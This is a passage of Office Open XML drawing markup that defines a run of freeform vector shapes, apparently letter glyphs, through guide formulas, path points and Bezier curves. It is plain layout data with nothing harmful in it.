                <a:gd name="T17" fmla="*/ 274 h 304"/>
                <a:gd name="T18" fmla="*/ 20 w 226"/>
                <a:gd name="T19" fmla="*/ 274 h 304"/>
                <a:gd name="T20" fmla="*/ 0 w 226"/>
                <a:gd name="T21" fmla="*/ 289 h 304"/>
                <a:gd name="T22" fmla="*/ 20 w 226"/>
                <a:gd name="T23" fmla="*/ 304 h 304"/>
                <a:gd name="T24" fmla="*/ 85 w 226"/>
                <a:gd name="T25" fmla="*/ 304 h 304"/>
                <a:gd name="T26" fmla="*/ 105 w 226"/>
                <a:gd name="T27" fmla="*/ 289 h 304"/>
                <a:gd name="T28" fmla="*/ 85 w 226"/>
                <a:gd name="T29" fmla="*/ 274 h 304"/>
                <a:gd name="T30" fmla="*/ 70 w 226"/>
                <a:gd name="T31" fmla="*/ 274 h 304"/>
                <a:gd name="T32" fmla="*/ 70 w 226"/>
                <a:gd name="T33" fmla="*/ 182 h 304"/>
                <a:gd name="T34" fmla="*/ 70 w 226"/>
                <a:gd name="T35" fmla="*/ 30 h 304"/>
                <a:gd name="T36" fmla="*/ 123 w 226"/>
                <a:gd name="T37" fmla="*/ 30 h 304"/>
                <a:gd name="T38" fmla="*/ 192 w 226"/>
                <a:gd name="T39" fmla="*/ 91 h 304"/>
                <a:gd name="T40" fmla="*/ 123 w 226"/>
                <a:gd name="T41" fmla="*/ 152 h 304"/>
                <a:gd name="T42" fmla="*/ 70 w 226"/>
                <a:gd name="T43" fmla="*/ 152 h 304"/>
                <a:gd name="T44" fmla="*/ 70 w 226"/>
                <a:gd name="T45" fmla="*/ 3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304">
                  <a:moveTo>
                    <a:pt x="70" y="182"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="132" y="182"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="182"/>
                    <a:pt x="226" y="137"/>
                    <a:pt x="226" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="44"/>
                    <a:pt x="189" y="0"/>
                    <a:pt x="13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89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="304"/>
                    <a:pt x="105" y="304"/>
                    <a:pt x="105" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="274"/>
                    <a:pt x="92" y="274"/>
                    <a:pt x="85" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="182"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="70" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="123" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="30"/>
                    <a:pt x="192" y="64"/>
                    <a:pt x="192" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="117"/>
                    <a:pt x="171" y="152"/>
                    <a:pt x="123" y="152"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70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8" name="Freeform 160">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F82A66-34E8-4C30-9114-986326EE5DFA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647951" y="3032125"/>
              <a:ext cx="79375" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 120 w 204"/>
                <a:gd name="T1" fmla="*/ 20 h 304"/>
                <a:gd name="T2" fmla="*/ 100 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 304"/>
                <a:gd name="T4" fmla="*/ 21 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 304"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 15 h 304"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 304"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 30 h 304"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 304"/>
                <a:gd name="T14" fmla="*/ 21 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 304"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 289 h 304"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 304 h 304"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 304 h 304"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 289 h 304"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 304"/>
                <a:gd name="T26" fmla="*/ 120 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 304"/>
                <a:gd name="T28" fmla="*/ 120 w 204"/>
                <a:gd name="T29" fmla="*/ 2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4">
                  <a:moveTo>
                    <a:pt x="120" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="4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89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="304"/>
                    <a:pt x="204" y="304"/>
                    <a:pt x="204" y="289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20" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120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9" name="Freeform 161">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7077AD46-F099-48B9-9384-19B498BEF603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747964" y="3065463"/>
              <a:ext cx="77788" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 183 w 203"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 203"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 203"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 203 w 203"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 203"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 203"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 203"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 203"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 183 w 203"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 35 w 203"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 203"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168 w 203"/>
                <a:gd name="T27" fmla="*/ 94 h 222"/>
                <a:gd name="T28" fmla="*/ 35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183" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="124"/>
                    <a:pt x="203" y="124"/>
                    <a:pt x="203" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203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3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0" name="Freeform 162">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6DBAB33-A98C-44A6-AEFA-49B636EB0900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847976" y="3065463"/>
              <a:ext cx="90488" cy="88900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5 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31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50 w 234"/>
                <a:gd name="T33" fmla="*/ 111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4 w 234"/>
                <a:gd name="T41" fmla="*/ 155 h 222"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 1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3"/>
                    <a:pt x="0" y="108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lose/>
                  <a:moveTo>
                    <a:pt x="150" y="111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1" name="Freeform 163">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{667F82A5-2314-4179-B7C7-06C951F5BDDD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952751" y="3065463"/>
              <a:ext cx="73025" cy="88900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0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8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7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3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2" name="Freeform 164">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{102B2131-432E-4C12-8958-E06E69344D80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049589" y="3065463"/>
              <a:ext cx="77788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" name="Freeform 165">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1460F6DC-2CFB-43FE-97F9-4D8C66237491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249614" y="3065463"/>
              <a:ext cx="77788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" name="Freeform 166">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC79BEB8-6DA5-4732-89B5-88756C1A9370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341689" y="3067050"/>
              <a:ext cx="95250" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 250"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 250"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 250"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 250"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 250"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 43 w 250"/>
                <a:gd name="T11" fmla="*/ 34 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 250"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 250"/>
                <a:gd name="T15" fmla="*/ 188 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 250"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 250"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 250"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 250"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 250"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 250"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 250"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 250"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 250"/>
                <a:gd name="T33" fmla="*/ 75 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 250"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 250"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 250"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 250"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 250"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 250 w 250"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 250"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 250"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 250"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 250"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 250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" name="Freeform 167">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE8B15A1-7F6C-4D3D-A0E5-C313A710DF05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444876" y="3043238"/>
              <a:ext cx="80963" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77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7 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92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" name="Freeform 168">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F46F2102-09FF-48B1-9755-16D79DD83383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551239" y="3065463"/>
              <a:ext cx="77788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7" name="Freeform 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C55BB3A-9C83-4709-B595-FC6553E9D2B3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646489" y="3067050"/>
              <a:ext cx="87313" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 126 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53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1 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24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4 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 34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6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95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5" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="1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8" name="Freeform 170">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5F73A7B-6DA6-4510-8C1F-7BF574D3D6B6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851276" y="3065463"/>
              <a:ext cx="90488" cy="88900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6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1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3 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 111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3"/>
                    <a:pt x="0" y="108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5" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="111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9" name="Freeform 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18881CB0-FB8A-496B-ADB2-C87B53328CE7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056064" y="3065463"/>
              <a:ext cx="73025" cy="88900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0 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 143 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 160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8 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 162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7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3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4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5"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99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8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0" name="Freeform 172">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B0FDD16-6065-4511-A3D8-31825DC49E36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146551" y="3043238"/>
              <a:ext cx="80963" cy="111125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200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20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92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7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1" name="Freeform 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4798A58B-BA0F-4F3C-BEA3-AB1D2F8B49D5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248151" y="3067050"/>
              <a:ext cx="87313" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 126 h 218"/>
                <a:gd name="T2" fmla="*/ 185 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53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1 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24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4 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 34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6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124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2" name="Freeform 174">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65F640B-3608-461E-8785-850072BF4A4C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4357689" y="3032125"/>
              <a:ext cx="71438" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111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1 h 305"/>
                <a:gd name="T10" fmla="*/ 80 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 80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1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3" name="Freeform 175">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8B4B1CA-C628-4534-8E89-61EC57D26C16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445001" y="3067050"/>
              <a:ext cx="95250" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 250"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 250"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 250"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 250"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 250"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 43 w 250"/>
                <a:gd name="T11" fmla="*/ 34 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 250"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 250"/>
                <a:gd name="T15" fmla="*/ 188 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 250"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 250"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 250"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 250"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 250"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 250"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 250"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 250"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 250"/>
                <a:gd name="T33" fmla="*/ 75 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 250"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 250"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 250"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 250"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 250"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 250 w 250"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 250"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 250"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 250"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 250"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 250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4" name="Freeform 176">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E35A4267-4B6E-4F8B-81A2-32E823F5A15D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4548189" y="3065463"/>
              <a:ext cx="92075" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 240"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 240"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 240"/>
                <a:gd name="T5" fmla="*/ 32 h 335"/>
                <a:gd name="T6" fmla="*/ 150 w 240"/>
                <a:gd name="T7" fmla="*/ 82 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 240"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 240"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 240"/>
                <a:gd name="T13" fmla="*/ 162 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 240"/>
                <a:gd name="T15" fmla="*/ 82 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 240"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 240"/>
                <a:gd name="T19" fmla="*/ 30 h 335"/>
                <a:gd name="T20" fmla="*/ 220 w 240"/>
                <a:gd name="T21" fmla="*/ 47 h 335"/>
                <a:gd name="T22" fmla="*/ 240 w 240"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 240"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 240"/>
                <a:gd name="T27" fmla="*/ 17 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 240"/>
                <a:gd name="T29" fmla="*/ 2 h 335"/>
                <a:gd name="T30" fmla="*/ 20 w 240"/>
                <a:gd name="T31" fmla="*/ 82 h 335"/>
                <a:gd name="T32" fmla="*/ 36 w 240"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 26 w 240"/>
                <a:gd name="T35" fmla="*/ 163 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 240"/>
                <a:gd name="T37" fmla="*/ 199 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 240"/>
                <a:gd name="T39" fmla="*/ 261 h 335"/>
                <a:gd name="T40" fmla="*/ 116 w 240"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 233 w 240"/>
                <a:gd name="T43" fmla="*/ 261 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 240"/>
                <a:gd name="T45" fmla="*/ 204 h 335"/>
                <a:gd name="T46" fmla="*/ 126 w 240"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 240"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 76 w 240"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 240"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 240"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 240"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 116 w 240"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 240"/>
                <a:gd name="T61" fmla="*/ 261 h 335"/>
                <a:gd name="T62" fmla="*/ 50 w 240"/>
                <a:gd name="T63" fmla="*/ 226 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 240"/>
                <a:gd name="T65" fmla="*/ 218 h 335"/>
                <a:gd name="T66" fmla="*/ 204 w 240"/>
                <a:gd name="T67" fmla="*/ 261 h 335"/>
                <a:gd name="T68" fmla="*/ 116 w 240"/>
                <a:gd name="T69" fmla="*/ 30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335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="102" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="32"/>
                    <a:pt x="150" y="56"/>
                    <a:pt x="150" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="111"/>
                    <a:pt x="128" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="151"/>
                    <a:pt x="77" y="162"/>
                    <a:pt x="102" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="162"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="180" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="33"/>
                    <a:pt x="194" y="31"/>
                    <a:pt x="200" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="215" y="47"/>
                    <a:pt x="220" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="240" y="41"/>
                    <a:pt x="240" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="15"/>
                    <a:pt x="230" y="0"/>
